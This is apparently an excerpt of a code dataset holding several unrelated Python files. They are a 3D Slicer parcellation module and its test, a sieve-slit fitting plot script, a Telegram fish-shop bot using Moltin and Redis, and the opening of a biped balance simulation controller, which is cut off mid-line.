scrollArea.setWidget(widget)\n scrollArea.setWidgetResizable(True)\n scrollArea.setHorizontalScrollBarPolicy(qt.Qt.ScrollBarAlwaysOff)\n\n importMultipleDialog = qt.QDialog()\n importMultipleDialog.setWindowTitle(\"Import multiple overlay\")\n importMultipleDialog.setLayout(qt.QVBoxLayout())\n importMultipleDialog.layout().addWidget(scrollArea)\n importButton = qt.QPushButton(\"Import\")\n qt.QObject.connect(importButton, \"clicked()\", importMultipleDialog, \"accept()\")\n importMultipleDialog.layout().addWidget(importButton)\n result = importMultipleDialog.exec()\n if result != qt.QDialog.Accepted:\n if originalScalarName:\n self.logic.setScalarOverlay(self.parameterNode, originalScalarName)\n return\n\n for i in range(colorTableNode.GetNumberOfColors()):\n comboBox = comboBoxes[i]\n\n desintationId = comboBox.currentData\n if desintationId is None:\n continue\n\n destinationNode = slicer.mrmlScene.GetNodeByID(desintationId)\n if destinationNode is None:\n continue\n\n self.logic.convertOverlayToModelNode(self.logic.getOrigModelNode(self.parameterNode), importOverlay, destinationNode, i)\n\n color = [0.0, 0.0, 0.0, 1.0]\n colorTableNode.GetColor(i, color)\n destinationNode.GetDisplayNode().SetColor(color[:3])\n self.logic.exportOutputToSurfaceLabel(self.parameterNode)\n\n # Restore the original scalar name\n if originalScalarName:\n self.logic.setScalarOverlay(self.parameterNode, originalScalarName)\n\n def importMarkupNode(self):\n importNode = self.ui.importMarkupComboBox.currentNode()\n destinationNode = self.ui.destinationMarkupComboBox.currentNode()\n destinationNode.CopyContent(importNode)\n\n def importOverlay(self):\n self.logic.initializePedigreeIds(self.parameterNode)\n importOverlay = self.ui.importOverlayComboBox.currentText\n destinationNode = self.ui.destinationModelComboBox.currentNode()\n self.logic.convertOverlayToModelNode(self.logic.getOrigModelNode(self.parameterNode), importOverlay, destinationNode)\n self.logic.exportOutputToSurfaceLabel(self.parameterNode)\n\n def onPlaneCheckBox(self, checked):\n if self.parameterNode is None:\n return\n self.logic.setPlaneIntersectionVisible(checked)\n\n def onLabelOutlineCheckBox(self, checked):\n if self.parameterNode is None:\n return\n self.logic.setLabelOutlineVisible(checked)\n\nclass NeuroSegmentParcellationTest(ScriptedLoadableModuleTest):\n \"\"\"\n This is the test case for your scripted module.\n \"\"\"\n\n def setUp(self):\n \"\"\" Do whatever is needed to reset the state - typically a scene clear will be enough.\n \"\"\"\n slicer.mrmlScene.Clear()\n pass\n\n def runTest(self):\n \"\"\"Run as few or as many tests as needed here.\n \"\"\"\n self.setUp()\n\n self.meshParseTool1()\n\n def setupSphere(self, radius):\n\n sphereSource = vtk.vtkSphereSource()\n sphereSource.SetRadius(radius)\n sphereSource.SetPhiResolution(75)\n sphereSource.SetThetaResolution(75)\n sphereSource.Update()\n\n modelNode = slicer.mrmlScene.AddNewNodeByClass(\"vtkMRMLModelNode\")\n modelNode.SetAndObservePolyData(sphereSource.GetOutput())\n modelNode.CreateDefaultDisplayNodes()\n return modelNode\n\n def meshParseTool1(self):\n import time\n startTime = time.time()\n\n logic = NeuroSegmentParcellationLogic()\n parameterNode = logic.getParameterNode()\n\n origModelNode = self.setupSphere(50.0)\n pialModelNode = self.setupSphere(75.0)\n pialModelNode.GetDisplayNode().SetVisibility(False)\n\n logic.setOrigModelNode(parameterNode, origModelNode)\n logic.setPialModelNode(parameterNode, pialModelNode)\n\n parcellationQueryNode = slicer.vtkMRMLTextNode()\n parcellationQueryNode.SetName(\"ParcellationQuery\")\n parcellationQueryNode.SetText(\"\"\"_Planes = [ PA, PB, PC, PD ]; A = (PA & PB & PC); B = (PA & PB & PC); C = (PA & PB & PC); D = PD\"\"\")\n slicer.mrmlScene.AddNode(parcellationQueryNode)\n logic.setQueryNode(parcellationQueryNode)\n logic.parseParcellationString(parameterNode)\n\n planeA = slicer.util.getNode(\"PA\")\n planeA.SetOrigin([0, 0, 0])\n planeA.SetNormal([0, 0, 1])\n planeA.GetDisplayNode().SetVisibility(False)\n\n planeB = slicer.util.getNode(\"PB\")\n planeB.SetOrigin([0, 0, 0])\n planeB.SetNormal([1, 0, 0])\n planeB.GetDisplayNode().SetVisibility(False)\n\n planeC = slicer.util.getNode(\"PC\")\n planeC.SetOrigin([0, 0, 0])\n planeC.SetNormal([0, 1, 0])\n planeC.GetDisplayNode().SetVisibility(False)\n\n i = 0\n colors = [\n [1.0, 0.0, 0.0],\n [0.0, 1.0, 0.0],\n [0.0, 0.0, 1.0],\n [1.0, 1.0, 0.0],\n ]\n for outputModelNode in logic.getOutputModelNodes():\n outputModelNode.GetDisplayNode().SetColor(colors[i])\n i+=1\n\n seedPositions = [\n [[-24.256452560424805, -24.25225257873535, 36.426605224609375], [23.89341163635254, -22.64985466003418, 37.68958282470703]],\n [[24.005630493164062, 29.707569122314453, 32.274898529052734],[-19.602069854736328, 18.553592681884766, 42.119205474853516]],\n [[27.62245750427246, 29.372499465942383, -29.621036529541016],[-19.98876190185547, 31.806682586669922, -32.98733901977539]],\n [],\n ]\n\n logic.initializePedigreeIds(parameterNode)\n\n i = 0\n for toolNode in logic.getToolNodes():\n seed = logic.getInputSeedNode(toolNode)\n for point in seedPositions[i]:\n seed.AddFiducial(point[0], point[1], point[2])\n seed.GetDisplayNode().SetVisibility(False)\n logic.runDynamicModelerTool(toolNode)\n i+=1\n\n logic.exportOutputToSurfaceLabel(parameterNode)\n logic.setScalarOverlay(parameterNode, \"labels\")\n\n testDuration = time.time() - startTime\n logging.info(\"Test duration: %f\", testDuration)\n","sub_path":"NeuroSegmentParcellation/NeuroSegmentParcellation.py","file_name":"NeuroSegmentParcellation.py","file_ext":"py","file_size_in_byte":46335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"642928130","text":"#!./bin/grutinizer-python\nimport sys\nsys.path.append('./util/rcnp')\nfrom sieveslit_raytracer import *\nfrom pretty_matplotlib import *\nfrom setfont import *\n\nif __name__==\"__main__\":\n del sys.argv[0] # grutinizer/root issue\n setfont()\n\n\n tfile = ROOT.TFile(\"hist9026_raytrace.root\")\n hist = tfile.Get(\"Target/B[A]\")\n\n fig = plt.figure()\n axes = fig.add_subplot(1,1,1)\n setticks(axes,xmajor=10,xminor=2,ymajor=50,yminor=10)\n mat = axes.pcolormesh(*plot_root_2d_hist(hist))\n fig.colorbar(mat)\n\n # fitting sieveslit\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input\", type=str,help=\"Input sieve slit data\",default=None)\n args = parser.parse_args()\n\n if not args.input:\n parser.error(\"No input file specified.\")\n\n fitter = SieveSlitFit(args.input,x=2,a=2,y=1)\n fitter.global_fit()\n fitter.plot_global_fit()\n\n\n\n\n if False:\n #fit diagnostics\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n X = np.arange(-600,600,20)\n A = np.arange(-0.1,0.1,0.0030)[0:len(X)]\n smallX=[]\n smallA=[]\n for i,x in enumerate(X):\n if x>=-450 and x<=350:\n smallX.append(x)\n for i,a in enumerate(A):\n if a>=-0.034 and a<0.064:\n smallA.append(a)\n # print len(smallX),len(smallA)\n X,A = np.meshgrid(smallX,smallA)\n Z = fitter.fit_a(X,A)\n #surf = ax.plot_surface(X,A,Z,rstride=1,cstride=1,cmap=cm.coolwarm,linewidth=0,antialiased=False)\n surf = ax.plot_wireframe(X,A,Z)\n\n xpts = []\n apts = []\n for row in fitter.data_holes:\n xpts.append(row[0])\n apts.append(row[1])\n ax.scatter(xpts,apts,fitter.fit_a(np.asarray(xpts),np.asarray(apts)),c='red')\n\n\n\n #plt.savefig(\"/user/sullivan/public_html/sieve_uncor.pdf\")\n plt.show()\n","sub_path":"util/rcnp/plot_sieve_fit.py","file_name":"plot_sieve_fit.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"618149239","text":"import os\nimport logging\n\nfrom moltin_api import get_products, get_product, get_product_image_url\nfrom moltin_api import add_product_to_cart, get_user_cart_items, get_user_cart\nfrom moltin_api import delete_product_from_cart, create_customer\nfrom tools import get_product_info, get_user_cart_info, is_phone_number_valid\nfrom tools import is_email_valid\nfrom custom_logger import LogsHandler\n\nimport redis\nfrom dotenv import load_dotenv\nfrom telegram.ext import Updater, Filters\nfrom telegram.ext import CallbackQueryHandler, CommandHandler, MessageHandler\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\n\n\nlogger = logging.getLogger('Telegram logger')\ndatabase = None\n\n\ndef create_keyboard_for_menu():\n products = get_products()\n keyboard = [\n [InlineKeyboardButton(f'{product[\"name\"]}', callback_data=product[\"id\"])]\n for product in products\n ]\n keyboard.append([InlineKeyboardButton('Cart', callback_data='cart')])\n return InlineKeyboardMarkup(keyboard)\n\n\ndef create_keyboard_for_product_description(product):\n product_quantity = product['meta']['stock']['level']\n product_id = product['id']\n keyboard = list()\n\n if not product_quantity:\n quantity_selection = None\n elif product_quantity <= 5:\n quantity_selection = [1, 3]\n else:\n quantity_selection = [1, 3, 5]\n\n if quantity_selection:\n selection_buttons = [\n InlineKeyboardButton(\n f'{quantity}kg', callback_data=f'{product_id},{quantity}'\n )\n for quantity in quantity_selection\n ]\n keyboard.append(selection_buttons)\n keyboard.append([InlineKeyboardButton('Cart', callback_data='cart')])\n keyboard.append([InlineKeyboardButton('Back', callback_data='back')])\n return InlineKeyboardMarkup(keyboard)\n\n\ndef create_keyboard_for_cart(user_cart_items):\n keyboard = [\n [\n InlineKeyboardButton(\n f'Remove {item[\"name\"]} from the cart',\n callback_data=item['id']\n )\n ]\n for item in user_cart_items\n ]\n keyboard.append([InlineKeyboardButton('Buy', callback_data='buy')])\n keyboard.append([InlineKeyboardButton('Back to menu', callback_data='menu')])\n return InlineKeyboardMarkup(keyboard)\n\n\ndef create_keyboard_for_confirm():\n keyboard = [\n [InlineKeyboardButton('Yes', callback_data='yes')],\n [InlineKeyboardButton('No', callback_data='no')],\n ]\n return InlineKeyboardMarkup(keyboard)\n\n\ndef delete_message(bot, update):\n bot.delete_message(\n chat_id=update.callback_query.message.chat_id,\n message_id=update.callback_query.message.message_id\n )\n\n\ndef start(bot, update):\n if update.message:\n chat_id = update.message.chat_id\n else:\n chat_id = update.callback_query.message.chat_id\n delete_message(bot, update)\n\n bot.send_message(\n chat_id=chat_id,\n text='Please choose fish:',\n reply_markup=create_keyboard_for_menu()\n )\n return \"HANDLE_MENU\"\n\n\ndef handle_menu(bot, update):\n if update.callback_query.data == 'cart':\n return handle_description(bot, update)\n\n product_id = update.callback_query.data\n product = get_product(product_id)\n product_info = get_product_info(product)\n product_image_url = get_product_image_url(\n product['relationships']['main_image']['data']['id']\n )\n delete_message(bot, update)\n bot.send_photo(\n chat_id=update.callback_query.message.chat_id,\n photo=product_image_url,\n caption=product_info,\n reply_markup=create_keyboard_for_product_description(product),\n )\n return 'HANDLE_DESCRIPTION'\n\n\ndef handle_description(bot, update):\n if update.callback_query.data == 'back':\n return start(bot, update)\n\n elif update.callback_query.data == 'cart' or\\\n update.callback_query.data == 'update_cart':\n delete_message(bot, update)\n user_id = update.callback_query.message.chat_id\n user_cart_items = get_user_cart_items(user_id)\n user_cart = get_user_cart(user_id)\n bot.send_message(\n chat_id=user_id,\n text=get_user_cart_info(user_cart_items, user_cart),\n reply_markup=create_keyboard_for_cart(user_cart_items)\n )\n return 'HANDLE_CART'\n\n product_id, quantity_of_product = update.callback_query.data.split(',')\n add_product_to_cart(\n product_id,\n int(quantity_of_product),\n update.callback_query.message.chat_id\n )\n return 'HANDLE_DESCRIPTION'\n\n\ndef handle_cart(bot, update):\n if update.callback_query.data == 'menu':\n return start(bot, update)\n elif update.callback_query.data == 'buy':\n bot.send_message(\n chat_id=update.callback_query.message.chat_id,\n text='What is your name?'\n )\n return 'WAITING_CUSTOMER_NAME'\n\n delete_product_from_cart(\n update.callback_query.message.chat_id,\n update.callback_query.data\n )\n update.callback_query.data = 'update_cart'\n return handle_description(bot, update)\n\n\ndef handle_waiting_customer_name(bot, update):\n if update.message:\n customer_name = update.message.text\n database.set(f'customer_{update.message.chat_id}:name', customer_name)\n update.message.reply_text('Please give me your email.')\n else:\n bot.send_message(\n chat_id=update.callback_query.message.chat_id,\n text='Please give me your email.'\n )\n return 'WAITING_EMAIL'\n\n\ndef handle_email(bot, update):\n email = update.message.text\n if not is_email_valid(email):\n update.message.reply_text(\n f'You sent the wrong email: {email}\\nPlease try again'\n )\n return 'HANDLE_EMAIL'\n database.set(f'customer_{update.message.chat_id}:email', email)\n update.message.reply_text(text='Please give me your phone number.')\n return 'WAITING_PHONE_NUMBER'\n\n\ndef handle_waiting_phone_number(bot, update):\n phone_number = update.message.text\n if not is_phone_number_valid(phone_number):\n update.message.reply_text(\n text=f'You sent the wrong phone number: {phone_number}.\\n' +\n 'Your phone number should be like: +7 *** *** ** **\\n' +\n 'Please try again.'\n )\n return 'WAITING_PHONE_NUMBER'\n database.set(f'customer_{update.message.chat_id}:phone_number', phone_number)\n customer_email = database.get(\n f'customer_{update.message.chat_id}:email'\n ).decode('utf-8')\n bot.send_message(\n chat_id=update.message.chat_id,\n text=f'Are your data correct?\\n' +\n f'Your email: {customer_email}\\nYour phone number: {phone_number}',\n reply_markup=create_keyboard_for_confirm()\n )\n return 'HANDLE_CONFIRM_PERSONAL_DATA'\n\n\ndef handle_confirm_personal_data(bot, update):\n customer_name = database.get(\n f'customer_{update.callback_query.message.chat_id}:name'\n ).decode('utf-8')\n email = database.get(\n f'customer_{update.callback_query.message.chat_id}:email'\n ).decode('utf-8')\n if update.callback_query.data == 'yes':\n bot.send_message(\n chat_id=update.callback_query.message.chat_id,\n text='Thank you for the order!\\nWe will contact you shortly!',\n )\n create_customer(customer_name, email)\n return start(bot, update)\n else:\n bot.send_message(\n chat_id=update.callback_query.message.chat_id,\n text='Enter your data again.',\n )\n return handle_waiting_customer_name(bot, update)\n\n\ndef handle_users_reply(bot, update):\n database = get_database_connection()\n if update.message:\n user_reply = update.message.text\n chat_id = update.message.chat_id\n elif update.callback_query:\n user_reply = update.callback_query.data\n chat_id = update.callback_query.message.chat_id\n else:\n return\n if user_reply == '/start':\n user_state = 'START'\n else:\n user_state = database.get(chat_id).decode('utf-8')\n\n states_functions = {\n 'START': start,\n 'HANDLE_MENU': handle_menu,\n 'HANDLE_DESCRIPTION': handle_description,\n 'HANDLE_CART': handle_cart,\n 'WAITING_CUSTOMER_NAME': handle_waiting_customer_name,\n 'WAITING_EMAIL': handle_email,\n 'WAITING_PHONE_NUMBER': handle_waiting_phone_number,\n 'HANDLE_CONFIRM_PERSONAL_DATA': handle_confirm_personal_data\n }\n state_handler = states_functions[user_state]\n\n try:\n next_state = state_handler(bot, update)\n database.set(chat_id, next_state)\n except Exception as error:\n logger.exception(error)\n\n\ndef get_database_connection():\n global database\n if database is None:\n redis_password = os.getenv('REDIS_PASSWORD')\n redis_host = os.getenv('REDIS_HOST')\n redis_port = os.getenv('REDIS_PORT')\n database = redis.Redis(\n host=redis_host,\n port=redis_port,\n password=redis_password\n )\n return database\n\n\ndef run_bot():\n load_dotenv()\n logging.basicConfig(\n level=logging.INFO,\n format='%(levelname)s:%(name)s:%(message)s'\n )\n logger.addHandler(LogsHandler())\n telegram_token = os.getenv('TELEGRAM_TOKEN')\n updater = Updater(telegram_token)\n dispather = updater.dispatcher\n dispather.add_handler(CallbackQueryHandler(handle_users_reply))\n dispather.add_handler(MessageHandler(Filters.text, handle_users_reply))\n dispather.add_handler(CommandHandler('start', handle_users_reply))\n updater.start_polling()\n logger.info('The bot is running')\n\n\nif __name__ == '__main__':\n run_bot()","sub_path":"telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":9798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"266108337","text":"from fltk import *\nimport copy\nimport numpy as np\nimport math\n\nimport sys\nif '../..' not in sys.path:\n sys.path.append('../..')\nfrom PyCommon.modules.Math import mmMath as mm\nfrom PyCommon.modules.Resource import ysMotionLoader as yf\nfrom PyCommon.modules.Renderer import ysRenderer as yr\nfrom PyCommon.modules.Simulator import csVpWorld as cvw\nfrom PyCommon.modules.Simulator import csVpModel as cvm\n# from PyCommon.modules.GUI import ysSimpleViewer as ysv\nfrom PyCommon.modules.GUI import hpSimpleViewer as hsv\nfrom PyCommon.modules.Optimization import ysAnalyticConstrainedOpt as yac\nfrom PyCommon.modules.Util import ysPythonEx as ype\nfrom PyCommon.modules.ArticulatedBody import ysReferencePoints as yrp\nfrom PyCommon.modules.ArticulatedBody import ysMomentum as ymt\nfrom PyCommon.modules.ArticulatedBody import ysControl as yct\nfrom PyCommon.modules.ArticulatedBody import hpInvKineDart as hik\n\nfrom MomentumProject.foot_example_segfoot_constraint import mtOptimize as mot\nfrom MomentumProject.foot_example_segfoot_constraint import mtInitialize as mit\nfrom MomentumProject.foot_example_segfoot_constraint.foot_window import FootWindow\n\nfrom PyCommon.modules.ArticulatedBody import hpFootIK as hfi\n# from scipy.spatial import Delaunay\n\n# import pydart2 as pydart\n# from PyCommon.modules.Simulator import csDartModel as cdm\n# from OpenGL.GL import *\n# from OpenGL.GLUT import *\n\n\ng_initFlag = 0\nforceShowTime = 0\n\nJsysPre = 0\nJsupPreL = 0\nJsupPreR = 0\nJconstPre = 0\n\ncontactChangeCount = 0\ncontactChangeType = 0\ncontact = 0\nmaxContactChangeCount = 30\n\npreFootCenter = [None]\n\nDART_CONTACT_ON = False\nSKELETON_ON = True\n\n\ndef main():\n # np.set_printoptions(precision=4, linewidth=200)\n np.set_printoptions(precision=5, threshold=np.inf, suppress=True, linewidth=3000)\n\n motionFile = 'wd2_tiptoe.bvh'\n motionFile = 'wd2_tiptoe_zygote.bvh'\n # motion, mcfg, wcfg, stepsPerFrame, config, frame_rate = mit.create_biped(motionFile, SEGMENT_FOOT_RAD=0.008)\n motion, mcfg, wcfg, stepsPerFrame, config, frame_rate = mit.create_biped(motionFile, SEGMENT_FOOT_MAG=0.01, SEGMENT_FOOT_RAD=0.008)\n # motion, mcfg, wcfg, stepsPerFrame, config, frame_rate = mit.create_biped()\n # motion, mcfg, wcfg, stepsPerFrame, config = mit.create_jump_biped()\n\n vpWorld = cvw.VpWorld(wcfg)\n vpWorld.SetGlobalDamping(0.999)\n motionModel = cvm.VpMotionModel(vpWorld, motion[0], mcfg)\n controlModel = cvm.VpControlModel(vpWorld, motion[0], mcfg)\n # controlModel_shadow_for_ik = cvm.VpControlModel(vpWorld, motion[0], mcfg)\n vpWorld.initialize()\n controlModel.initializeHybridDynamics()\n\n # controlToMotionOffset = (1.5, -0.02, 0)\n controlToMotionOffset = (1.5, 0., 0)\n controlModel.translateByOffset(controlToMotionOffset)\n # controlModel_shadow_for_ik.set_q(controlModel.get_q())\n # controlModel_shadow_for_ik.computeJacobian(0, np.array([0., 0., 0.]))\n\n wcfg_ik = copy.deepcopy(wcfg)\n vpWorld_ik = cvw.VpWorld(wcfg_ik)\n controlModel_ik = cvm.VpControlModel(vpWorld_ik, motion[0], mcfg)\n vpWorld_ik.initialize()\n controlModel_ik.set_q(np.zeros_like(controlModel.get_q()))\n\n\n\n totalDOF = controlModel.getTotalDOF()\n DOFs = controlModel.getDOFs()\n\n foot_dofs = []\n left_foot_dofs = []\n right_foot_dofs = []\n\n foot_seg_dofs = []\n left_foot_seg_dofs = []\n right_foot_seg_dofs = []\n\n # for joint_idx in range(motion[0].skeleton.getJointNum()):\n for joint_idx in range(controlModel.getJointNum()):\n joint_name = controlModel.index2name(joint_idx)\n # joint_name = motion[0].skeleton.getJointName(joint_idx)\n if 'Foot' in joint_name:\n foot_dofs_temp = controlModel.getJointDOFIndexes(joint_idx)\n foot_dofs.extend(foot_dofs_temp)\n if 'Left' in joint_name:\n left_foot_dofs.extend(foot_dofs_temp)\n elif 'Right' in joint_name:\n right_foot_dofs.extend(foot_dofs_temp)\n\n if 'foot' in joint_name:\n foot_dofs_temp = controlModel.getJointDOFIndexes(joint_idx)\n foot_seg_dofs.extend(foot_dofs_temp)\n if 'Left' in joint_name:\n left_foot_seg_dofs.extend(foot_dofs_temp)\n elif 'Right' in joint_name:\n right_foot_seg_dofs.extend(foot_dofs_temp)\n\n # parameter\n Kt = config['Kt']; Dt = config['Dt'] # tracking gain\n Kl = config['Kl']; Dl = config['Dl'] # linear balance gain\n Kh = config['Kh']; Dh = config['Dh'] # angular balance gain\n Ks = config['Ks']; Ds = config['Ds'] # penalty force spring gain\n\n Bt = config['Bt']\n Bl = config['Bl']\n Bh = config['Bh']\n\n selectedBody = motion[0].skeleton.getJointIndex(config['end'])\n constBody = motion[0].skeleton.getJointIndex('RightFoot')\n\n supL = motion[0].skeleton.getJointIndex('LeftFoot')\n supR = motion[0].skeleton.getJointIndex('RightFoot')\n\n # momentum matrix\n linkMasses = controlModel.getBodyMasses()\n totalMass = controlModel.getTotalMass()\n TO = ymt.make_TO(linkMasses)\n dTO = ymt.make_dTO(len(linkMasses))\n\n # optimization\n problem = yac.LSE(totalDOF, 12)\n # a_sup = (0,0,0, 0,0,0) #ori\n # a_sup = (0,0,0, 0,0,0) #L\n CP_old = [mm.v3(0., 0., 0.)]\n\n # penalty method\n bodyIDsToCheck = list(range(vpWorld.getBodyNum()))\n # mus = [1.]*len(bodyIDsToCheck)\n mus = [.5]*len(bodyIDsToCheck)\n\n # flat data structure\n ddth_des_flat = ype.makeFlatList(totalDOF)\n dth_flat = ype.makeFlatList(totalDOF)\n ddth_sol = ype.makeNestedList(DOFs)\n\n # viewer\n rd_footCenter = [None]\n rd_footCenter_ref = [None]\n rd_footCenterL = [None]\n rd_footCenterR = [None]\n rd_CM_plane = [None]\n rd_CM = [None]\n rd_CP = [None]\n rd_CP_des = [None]\n rd_dL_des_plane = [None]\n rd_dH_des = [None]\n rd_grf_des = [None]\n\n rd_exf_des = [None]\n rd_exfen_des = [None]\n rd_root_des = [None]\n\n rd_foot_ori = [None]\n rd_foot_pos = [None]\n\n rd_root_ori = [None]\n rd_root_pos = [None]\n\n rd_CF = [None]\n rd_CF_pos = [None]\n\n rootPos = [None]\n selectedBodyId = [selectedBody]\n extraForce = [None]\n extraForcePos = [None]\n\n rightFootVectorX = [None]\n rightFootVectorY = [None]\n rightFootVectorZ = [None]\n rightFootPos = [None]\n\n rightVectorX = [None]\n rightVectorY = [None]\n rightVectorZ = [None]\n rightPos = [None]\n\n def makeEmptyBasicSkeletonTransformDict(init=None):\n Ts = dict()\n Ts['pelvis'] = init\n Ts['spine_ribs'] = init\n Ts['head'] = init\n Ts['thigh_R'] = init\n Ts['shin_R'] = init\n Ts['foot_heel_R'] = init\n Ts['foot_R'] = init\n Ts['heel_R'] = init\n Ts['outside_metatarsal_R'] = init\n Ts['outside_phalanges_R'] = init\n Ts['inside_metatarsal_R'] = init\n Ts['inside_phalanges_R'] = init\n Ts['upper_limb_R'] = init\n Ts['lower_limb_R'] = init\n Ts['thigh_L'] = init\n Ts['shin_L'] = init\n Ts['foot_heel_L'] = init\n Ts['foot_L'] = init\n Ts['heel_L'] = init\n Ts['outside_metatarsal_L'] = init\n Ts['outside_phalanges_L'] = init\n Ts['inside_metatarsal_L'] = init\n Ts['inside_phalanges_L'] = init\n\n Ts['upper_limb_L'] = init\n Ts['lower_limb_L'] = init\n\n return Ts\n\n # viewer = ysv.SimpleViewer()\n # viewer = hsv.hpSimpleViewer(rect=[0, 0, 1024, 768], viewForceWnd=False)\n viewer = hsv.hpSimpleViewer(rect=[0, 0, 960+300, 1+1080+55], viewForceWnd=False)\n # viewer.record(False)\n # viewer.doc.addRenderer('motion', yr.JointMotionRenderer(motion, (0,255,255), yr.LINK_BONE))\n viewer.doc.addObject('motion', motion)\n viewer.doc.addRenderer('motionModel', yr.VpModelRenderer(motionModel, (150,150,255), yr.POLYGON_FILL))\n viewer.doc.setRendererVisible('motionModel', False)\n viewer.doc.addRenderer('ikModel', yr.VpModelRenderer(controlModel_ik, (150,150,255), yr.POLYGON_LINE))\n viewer.doc.setRendererVisible('ikModel', False)\n # viewer.doc.addRenderer('controlModel', cvr.VpModelRenderer(controlModel, (255,240,255), yr.POLYGON_LINE))\n control_model_renderer = yr.VpModelRenderer(controlModel, (255,240,255), yr.POLYGON_FILL)\n viewer.doc.addRenderer('controlModel', control_model_renderer)\n skeleton_renderer = None\n if SKELETON_ON:\n # skeleton_renderer = yr.BasicSkeletonRenderer(makeEmptyBasicSkeletonTransformDict(np.eye(4)), offset_Y=-0.08)\n # skeleton_renderer = yr.BasicSkeletonRenderer(makeEmptyBasicSkeletonTransformDict(np.eye(4)), color=(230, 230, 230), offset_draw=(0.8, -0.02, 0.))\n skeleton_renderer = yr.BasicSkeletonRenderer(makeEmptyBasicSkeletonTransformDict(np.eye(4)), color=(230, 230, 230), offset_draw=(0., -0.0, 0.))\n viewer.doc.addRenderer('skeleton', skeleton_renderer)\n viewer.doc.addRenderer('rd_footCenter', yr.PointsRenderer(rd_footCenter))\n viewer.doc.setRendererVisible('rd_footCenter', False)\n viewer.doc.addRenderer('rd_footCenter_ref', yr.PointsRenderer(rd_footCenter_ref))\n viewer.doc.setRendererVisible('rd_footCenter_ref', False)\n viewer.doc.addRenderer('rd_CM_plane', yr.PointsRenderer(rd_CM_plane, (255,255,0)))\n viewer.doc.setRendererVisible('rd_CM_plane', False)\n viewer.doc.addRenderer('rd_CP', yr.PointsRenderer(rd_CP, (0,255,0)))\n viewer.doc.setRendererVisible('rd_CP', False)\n viewer.doc.addRenderer('rd_CP_des', yr.PointsRenderer(rd_CP_des, (255,0,255)))\n viewer.doc.setRendererVisible('rd_CP_des', False)\n viewer.doc.addRenderer('rd_dL_des_plane', yr.VectorsRenderer(rd_dL_des_plane, rd_CM, (255,255,0)))\n viewer.doc.setRendererVisible('rd_dL_des_plane', False)\n viewer.doc.addRenderer('rd_dH_des', yr.VectorsRenderer(rd_dH_des, rd_CM, (0,255,0)))\n viewer.doc.setRendererVisible('rd_dH_des', False)\n # viewer.doc.addRenderer('rd_grf_des', yr.ForcesRenderer(rd_grf_des, rd_CP_des, (0,255,0), .001))\n viewer.doc.addRenderer('rd_CF', yr.VectorsRenderer(rd_CF, rd_CF_pos, (255,255,0)))\n viewer.doc.setRendererVisible('rd_CF', False)\n viewer.doc.addRenderer('rd_foot_ori', yr.OrientationsRenderer(rd_foot_ori, rd_foot_pos, (255,255,0)))\n viewer.doc.setRendererVisible('rd_foot_ori', False)\n\n viewer.doc.addRenderer('rd_root_ori', yr.OrientationsRenderer(rd_root_ori, rd_root_pos, (255,255,0)))\n viewer.doc.setRendererVisible('rd_root_ori', False)\n\n viewer.doc.addRenderer('extraForce', yr.VectorsRenderer(rd_exf_des, extraForcePos, (0,255,0)))\n viewer.doc.setRendererVisible('extraForce', False)\n viewer.doc.addRenderer('extraForceEnable', yr.VectorsRenderer(rd_exfen_des, extraForcePos, (255,0,0)))\n\n # viewer.doc.addRenderer('right_foot_oriX', yr.VectorsRenderer(rightFootVectorX, rightFootPos, (255,0,0)))\n # viewer.doc.addRenderer('right_foot_oriY', yr.VectorsRenderer(rightFootVectorY, rightFootPos, (0,255,0)))\n # viewer.doc.addRenderer('right_foot_oriZ', yr.VectorsRenderer(rightFootVectorZ, rightFootPos, (0,0,255)))\n\n # viewer.doc.addRenderer('right_oriX', yr.VectorsRenderer(rightVectorX, rightPos, (255,0,0)))\n # viewer.doc.addRenderer('right_oriY', yr.VectorsRenderer(rightVectorY, rightPos, (0,255,0)))\n # viewer.doc.addRenderer('right_oriZ', yr.VectorsRenderer(rightVectorZ, rightPos, (0,0,255)))\n\n # foot_viewer = FootWindow(viewer.x() + viewer.w() + 20, viewer.y(), 300, 400, 'foot contact modifier', controlModel)\n foot_viewer = None # type: FootWindow\n\n initKt = 25.\n # initKt = 60.\n initKl = 100.\n initKh = 100.\n\n initBl = .1\n initBh = .13\n # initSupKt = 17\n initSupKt = 22\n\n initFm = 50.0\n\n initComX = 0.\n initComY = 0.\n initComZ = 0.\n\n viewer.objectInfoWnd.add1DSlider(\"Kt\", 0., 300., 1., initKt)\n viewer.objectInfoWnd.add1DSlider(\"Kl\", 0., 300., 1., initKl)\n viewer.objectInfoWnd.add1DSlider(\"Kh\", 0., 300., 1., initKh)\n viewer.objectInfoWnd.add1DSlider(\"Bl\", 0., 1., .001, initBl)\n viewer.objectInfoWnd.add1DSlider(\"Bh\", 0., 1., .001, initBh)\n viewer.objectInfoWnd.add1DSlider(\"SupKt\", 0., 300., 0.1, initSupKt)\n viewer.objectInfoWnd.add1DSlider(\"Fm\", 0., 1000., 10., initFm)\n viewer.objectInfoWnd.add1DSlider(\"com X offset\", -1., 1., 0.01, initComX)\n viewer.objectInfoWnd.add1DSlider(\"com Y offset\", -1., 1., 0.01, initComY)\n viewer.objectInfoWnd.add1DSlider(\"com Z offset\", -1., 1., 0.01, initComZ)\n viewer.objectInfoWnd.add1DSlider(\"tiptoe angle\", -0.5, .5, 0.001, 0.)\n viewer.objectInfoWnd.add1DSlider(\"left tilt angle\", -0.5, .5, 0.001, 0.)\n viewer.objectInfoWnd.add1DSlider(\"right tilt angle\", -0.5, .5, 0.001, 0.)\n\n viewer.force_on = False\n\n def viewer_SetForceState(object):\n viewer.force_on = True\n\n def viewer_GetForceState():\n return viewer.force_on\n\n def viewer_ResetForceState():\n viewer.force_on = False\n\n viewer.objectInfoWnd.addBtn('Force on', viewer_SetForceState)\n viewer_ResetForceState()\n\n offset = 60\n\n viewer.objectInfoWnd.begin()\n viewer.objectInfoWnd.labelForceX = Fl_Value_Input(20, 30+offset*9, 40, 20, 'X')\n viewer.objectInfoWnd.labelForceX.value(0)\n\n viewer.objectInfoWnd.labelForceY = Fl_Value_Input(80, 30+offset*9, 40, 20, 'Y')\n 